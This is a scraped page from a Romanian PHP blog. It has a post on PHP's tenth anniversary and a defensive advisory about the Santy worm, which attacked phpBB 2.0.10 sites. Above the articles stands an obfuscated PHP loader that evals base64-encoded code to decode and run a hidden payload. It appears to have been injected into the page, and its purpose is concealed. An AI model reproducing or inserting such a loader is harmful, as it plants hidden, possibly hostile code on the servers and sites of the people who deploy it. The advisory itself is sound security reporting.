$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iVnNCVEFFYml1aFN4S05sT3dYREpmZ0lucVJ2ZXpqWkZrcldVdHlNUENZR0xRb2NhcG1kSEFreVVNcUZWSXNUbHRoYWVnY1lLcmltQkNKTHZuWmp4UldmUHBHWHViZEVRem9TSHdORE91WTlnSE9NaVl6bz0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> PHP – Pagina 9 – PHPRomania

PHP

PHP la 10 ani!

In 8 iunie 1995 Rasmus anunta prima versiune de PHP: Personal Home Page Tools (PHP Tools) version 1.0.

Mesajul original il gasiti aici

Announcing the Personal Home Page Tools (PHP Tools) version 1.0.

Printre facilitati gasim:

. Logging accesses to your pages in your own private log files
. Real-time viewing of log information
. Providing a nice interface to this log information
. Displaying last access information right on your pages
. Full daily and total access counters
. Banning access to users based on their domain
. Password protecting pages based on users’ domains
. Tracking accesses ** based on users’ e-mail addresses **
. Tracking referring URL’s – HTTP_REFERER support
. Performing server-side includes without needing server support for it
. Ability to not log accesses from certain domains (ie. your own)
. Easily create and display forms
. Ability to use form information in following documents

Read more...

Atacuri asupra site-urilor cu phpBB

A fost raportata aparitia unui atac asupra site-urilor web care folosesc phpBB, si care are ca efect distrugerea completa a datelor stocate in fisierele ce constitue site-ul respectiv. Pe data de 22 Noiembrie, GeCAD NET a lansat o alerta de grad ridicat despre o serie de vulnerabilitati descoperite in phpBB versiunea 2.0.10. Una dintre acestea parea sa fie posibil de exploatat pentru a executa cod controlat de un posibil atacator, pe sistemul afectat (pentru mai multe detalii, consultati alerta GeCAD NET Vulnerabilitati in phpBB). Incepand din 21 Decembrie, companii producatoare de programe antivirus, precum Trend Micro si Symantec, au primit semnale ca a aparut si se propaga pe Internet o amenintare asemanatoare din punctul de vedere al comportamentului cu un virus de tip worm, care exploateaza vulnerabilitatea prezentata mai sus din phpBB pentru a se raspandi. Aceasta amenintare a primit numele de Santy (pentru mai multe detalii, consultati alerta GeCAD NET WORM_SANTY.A). Amenintarea este reprezentata printr-un fisier script Perl, care foloseste motorul de cautare de la Google pentru a cauta servere de web care folosesc phpBB. Odata identificat un astfel de server, se va incerca exploatarea vulnerabilitatii prezentate mai sus. In cazul in care aceasta reuseste, viermele se va copia pe serverul atacat si se va lansa in executie, reluand atacurile si de pe noul server compromis. Dupa detectarea atacurilor, echipa tehnica de la Google a modificat modul de acces la motorul de cautare astfel incat in acest moment cautarile efectuate prin acest script sunt blocate, ca urmare raspandirea acestuia se pare ca a fost intrerupta. Sunt vulnerabile toate serverele de Internet care gazduiesc servicii web si au instalat phpBB versiunea 2.0.10 sau inferioara. Nota: Aceasta amenintare nu are ca tinta utilizatorii ce folosesc browsere de Internet pentru a vizita site-uri, ci doar serverele de Internet. Deoarece pe serverul compromis toate fisierele cu continut web de pe site sunt suprascrise, conform motorului de cautare MSN Search (beta), au fost gasite peste 30.000 de site-uri continand textul folosit de worm pentru a suprascrie fisierele. Avertizare: Deoarece atacul este relativ simplu de executat si exista astfel deja un precedent, este posibila aparitia de variante care sa foloseasca alte motoare de cautare sau alte metode de cautare. Solutii: In cazul in care site-ul dumneavoastra are instalat phpBB, este absolut necesar sa actualizati la versiunea 2.0.11 care elimina vulnerabilitatea. Deoarece de curand au fost lansate noi versiuni de PHP care elimina o serie de vulnerabilitati, este recomandat sa actualizati si utilitarul PHP. Pentru mai multe detalii, consultati alerta GeCAD NET Vulnerabilitati multiple in PHP. Alte analize ale acestei amenintari pot fi gasite la adresele: http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SANTY.A&VSect=T http://securityresponse.symantec.com/avcenter/venc/data/perl.santy.html http://www.avira.com/en/threats/Perl_Santy.html Preluata de la http://www.gecadnet.ro/antivirus/?AID=1355

Read more...